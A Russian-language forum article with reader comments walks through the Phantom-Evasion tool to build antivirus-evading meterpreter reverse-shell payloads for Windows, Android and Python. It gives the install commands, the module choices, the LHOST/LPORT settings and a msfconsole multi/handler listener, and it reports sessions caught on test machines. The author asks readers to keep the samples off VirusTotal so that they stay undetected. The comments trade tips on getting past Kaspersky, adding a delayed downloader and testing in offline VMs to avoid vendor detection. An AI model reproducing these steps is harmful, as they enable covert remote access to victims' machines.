Статья Phantom-evasion FUD payloads

И снова Hello! Сегодня я хочу представить Вам удобный инструмент под названием Phantom-evasion.
Что он из себя представляет ?
Phantom-evasion - это удобный и простой в использовании инструмент для генерации полезной нагрузки, написан на Python, совместим с версиями python 2.7 and 3.4 и выше.

(Для генерации pyinstaller требуется python 2.7). Основной задачей данного инструмента является генерирование полезной нагрузки с обходом почти АВ почти 100% FUD на сегодняшний день.
Форматы выпуска payloads: exe/elf/apk/dmg
Платформы:
Windows,Linux,Android,Osx,Universal (Platform-Target)
Виды payloads:
  • windows/meterpreter/reverse_tcp for exe
  • linux/x86/meterpreter/reverse_tcp for elf
  • android/meterpreter/reverse_tcp for apk
  • osx/x64/meterpreter/reverse_tcp for dmg
  • python/meterpreter/reverse_tcp in Universal modules
Формат модулей рассмотрим далее. Перейдем к установке. Я буду использовать Kali Linux 2017.3 в виде атакующей машины, Windows Server 2012 R3 и Windows 10 (Build 16299) в виде атакуемой машины.

Вся информация предоставляется в ознакомительных целях. Данная статья описывает последовательность действий и инструменты, с помощью которых злоумышленник может проникнуть в Вашу систему и похитить ваши данные.

Установка :
Код:
git clone https://github.com/oddcod3/Phantom-Evasion.git
cd Phantom-Evasion
chmod +x phantom-evasion.py


Запуск:
Код:
./phantom-evasion.py

Проверка зависимостей
upload_2017-11-26_20-26-44.png


Если все окей, то видим следующую картину:

upload_2017-11-26_20-27-36.png


Посмотреть список всех модулей:

Код:
1 enter

upload_2017-11-26_20-29-27.png


Сегодня я продемонстрирую генерацию полезной нагрузки для Windows, Android. Вернемся в главное меню (0). Выберем список модулей Windows (2)

upload_2017-11-26_20-30-44.png


Пробуем вариант под номер 1

upload_2017-11-26_20-31-40.png


Выберем способ генерации шелкода. Я выбираю с помощью всеми известного msfvenom.

Код:
1 enter
Далее нас просят выбрать тип payload. Я выберу следующий:
Код:
windows/meterpreter/reverse_https
Далее нужно прописать LHOST ( на какой айпишник стучаться)
Код:
ip
Далее нужно прописать LPORT(на какой порт стучаться)
Код:
2222
После выбрать имя файла
ForCodeby
После чего пойдет генерации и компиляция нашего payload. Если все успешно, то в нашей папке будет хранится файл ForCodeby.exe


upload_2017-11-26_20-38-3.png


Проверим работоспособность нашего payload, так же посмотрим результаты на nodistribute.com
Запустим хандлер и будет слушать Ip и порт, который мы указали при генерации payload:

Код:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.102
set LPORT 2222
exploit -j

После запуска на целевом компьютере в процессах появится процесс : ForCodeby.exe

upload_2017-11-26_20-45-37.png


Проверим файл на nodistribute.com



И видим полный FUD!!

upload_2017-11-26_20-49-22.png


Уважительная просьба не лить на VIRUS TOTAL. Дайте полезной нагрузке подышать свежим воздухом< ВЗДОХНУТЬ ГЛОТОК СВОБОДЫ!) Проверяйте хотя бы на сайте, на котором проверил я. От этого будет лучше всем, кроме АВ компаний. Спасибо!

Что ж, хороший старт, давайте создадим еще один с помощью другого способа, тоже для Windows. С использованием абсолютно тех же параметров, которые я указал выше. Я не буду скринить процесс, он ничем не будет отличаться от выше стоящего, за исключением выбора модуля.

Я выбираю:

Код:
[2] Windows MultipathHeapAlloc  (C)

upload_2017-11-26_20-55-3.png


Все, файл создан. Проверим работоспособность. Отправим на атакуемую машину и запустим.

upload_2017-11-26_20-58-22.png



Как видим снова Prof1t! ^_^
Процесс запущен, сессия прилетела. Доступ к командной строке получен =)


Результаты обнаружения тоже радуют глаз.

upload_2017-11-26_21-2-9.png


Что ж, я думаю с виндовс достаточно двух примеров. Сразу хочу сказать что 3-й способ я тоже пробовал
Какой - то Богом забытый что-то нашел, но это не страшно)

Результат :

Также, по просьбе ghostphisher в теме https://codeby.net/threads/uvazhaemye-avtory-tem.61280/ я проверю работоспособность PAYLOAD на Windows 10

ggbMEs7dOyg.jpg


Как видим, профит!

Теперь попробуй сгенерить файлик для анроид. Самому интересно че и как будет :)

В главном меню выберем:
Код:
[5]  List Android modules
Далее выбор не большой)
Код:
[1] Android Droidmare msfvenom-rebuilder (Smali)[/B][/B][/B][/B][/B]
[B][B][B][B][B][1] Obfuscate msf payload

После чего формальности заполнения LHOST and LPORT и выбор payload
Код:
android/meterpreter/reverse_https

PVIon_Ca_bQ.jpg


Собственно видим успешную генерацию PAYLOAD!) Но рано радоваться, надо проверить его работу и обнаружение! Убедительная просьба для тех, у кого есть анроид, проверить АВАСПОМ и dr Web. Почему сам не могу? У меня кирпич под названием "недостаточно памяти" galaxy ace S5830 который вздрагивает каждый раз, когда я беру его в руки. Поэтому я покажу результат обнаружения на нодистр, а внутренним антивирусом телефона не буду прогонять. Так же сейчас нахожусь не дома, поэтому нет виртуального ведроида) Просто запущу пайлоад, чтобы проверить его работу!

Сессия у меня не прилетает, не знаю с чем это связано. Может ведроид мой совсем плох, с помощью Evil-Droid сгенерированный файл отлично отрабатывает. Здесь процесс появился, но никто на порт не стучится. Если кто будет пробовать, отпишитесь о результатах у себя.


Обнаружение:

upload_2017-11-26_21-38-10.png



Теперь попробуем сгенерировать питоновский файл to exe)
Для этого в главном меню выберем 6


upload_2017-11-26_22-4-17.png




upload_2017-11-26_22-7-11.png


Код:
[2] Universal Polymorphic Pyhterpreter (Python)[/COLOR][/B][/COLOR][/B][/COLOR][/B][/COLOR][/B]
[B][COLOR=#ff8000][B][COLOR=#ff8000][B][COLOR=#ff8000][B][COLOR=#ff8000]python/meterpreter/reverse_https

Далее LHOST and LPORT и после предложить сгенерить .ехе, жмем y. Все на выходе появился наш файл.


Проверим его работу на вин 10 с питоном 2.7

upload_2017-11-26_22-11-5.png


После запуска на стороне вин 10 пришла сессия.
Результат скана :

upload_2017-11-26_22-12-46.png



Если подвести итоги, то в целом я получил хорошие впечатления) Вышел он недавно, надеюсь поживет еще. Хотя в версии 0.2 они обещали все обновить еще раз! Надеюсь статья получилось годной, спасибо за внимание, всем Prof1t! =)
 

Вложения

  • upload_2017-11-26_20-36-9.png
    upload_2017-11-26_20-36-9.png
    10,6 КБ · Просмотры: 278
  • upload_2017-11-26_20-58-4.png
    upload_2017-11-26_20-58-4.png
    128,1 КБ · Просмотры: 292
  • upload_2017-11-26_21-30-17.png
    upload_2017-11-26_21-30-17.png
    24,4 КБ · Просмотры: 339
  • upload_2017-11-26_21-30-42.png
    upload_2017-11-26_21-30-42.png
    25,3 КБ · Просмотры: 285
  • upload_2017-11-26_22-10-9.png
    upload_2017-11-26_22-10-9.png
    4,6 КБ · Просмотры: 314
Последнее редактирование модератором:
O

OneDollar

Всё классно, всё прекрастно с этой методикой, антивирусы не обнаруживают. Но вот только когда цель активирует данный пэйлоад, то антивирус в данном случае "касперский", блокирует сетевую атаку, тем самым не даёт получить сессию.
Как это обойти?

Короче "касперский" считает этот файл безопастным, а если проверять через сервес, то там 9/35.
Но вопрос который выше - актуален...
Не ну Каспера обойти надо постараться!) А вообще обнови софт, и добавь downloader к этому файлу с задержкой запуска, авось поможет))
 
  • Нравится
Реакции: Vertigo и Mitistofel

Bypass

Green Team
02.02.2018
451
579
BIT
0
Всё классно, всё прекрастно с этой методикой, антивирусы не обнаруживают. Но вот только когда цель активирует данный пэйлоад, то антивирус в данном случае "касперский", блокирует сетевую атаку, тем самым не даёт получить сессию.
Как это обойти?

Короче "касперский" считает этот файл безопастным, а если проверять через сервес, то там 9/35.
Но вопрос который выше - актуален...
ты когда на антивирусах проверяешь все дело не забывай что они сливают файлы к себе подозрительные для анализа, если ты сегодня сделаешь не паленый то через некоторое время он уже будет в базах.
Ставь виртуалку, накатывай антеверус обновляй базы, делай новый снимок, запускай снимок без подключения к инету, тестируй свой пайлоад. Тестнул удалил снимок. Когда будешь тестить следующий раз, то опять, обновы снимок и т.д.
 
  • Нравится
Реакции: Mitistofel

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
А вообще обнови софт
Да я его позавчера только установил, потому что ОС основную сносил, и у меня глобальные изменения. Так что получается он у меня обновлённыйй. Ну а так вообще да, нужно не забывать обновлять...
и добавь downloader к этому файлу с задержкой запуска, авось поможет)
Эта возможность встроена в саму программу, или это делается сторонними способами?

Ставь виртуалку, накатывай антеверус обновляй базы, делай новый снимок, запускай снимок без подключения к инету, тестируй свой пайлоад. Тестнул удалил снимок. Когда будешь тестить следующий раз, то опять, обновы снимок и т.д.
Отличная идея ).
А я раньше проверял антивирусником, потому что не кто точно мне и не смог сказать. Перестаёт ли быть беспалевным вирус, если его проверять на компьютере, с установленным на нём антивирусом...
Если рассуждать логично - то да перестаёт, потому что по идее, антивирусные компании должны были позаботиться об этом...
 

Bypass

Green Team
02.02.2018
451
579
BIT
0
Отличная идея ).
А я раньше проверял антивирусником, потому что не кто точно мне и не смог сказать. Перестаёт ли быть беспалевным вирус, если его проверять на компьютере, с установленным на нём антивирусом...
Если рассуждать логично - то да перестаёт, потому что по идее, антивирусные компании должны были позаботиться об этом...
в антивирусах есть галка отправлять мол на анализ, если ее отключить мое имхо это пофигу он будет всерано утягивать файлы к себе. Ибо нет доверия им. Это как в шинде вроде галки все снял при установки и она шпионит но уже не так в наглую.
 
  • Нравится
Реакции: Mitistofel

kossta.b

Member
01.02.2019
7
0
BIT
0
Ребята может все таки у кого то получилось что-то придумать с каспером?
screenshot2019-02-14001.1550151613.png


Единственно что удалось запустить с этим каспером и оно отрабатывает так это python/meterpreter/reverse_tcp. но там настолько ущербный функционал что хочется плакать... Может есть какие то решения из питоновского метерпретера получить вменяемый доступ на машине?
 
Э

Эмиль Вортт

Ребята может все таки у кого то получилось что-то придумать с каспером?
screenshot2019-02-14001.1550151613.png


Единственно что удалось запустить с этим каспером и оно отрабатывает так это python/meterpreter/reverse_tcp. но там настолько ущербный функционал что хочется плакать... Может есть какие то решения из питоновского метерпретера получить вменяемый доступ на машине?
Скорее всего никак не обойти
 
  • Нравится
Реакции: kossta.b
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!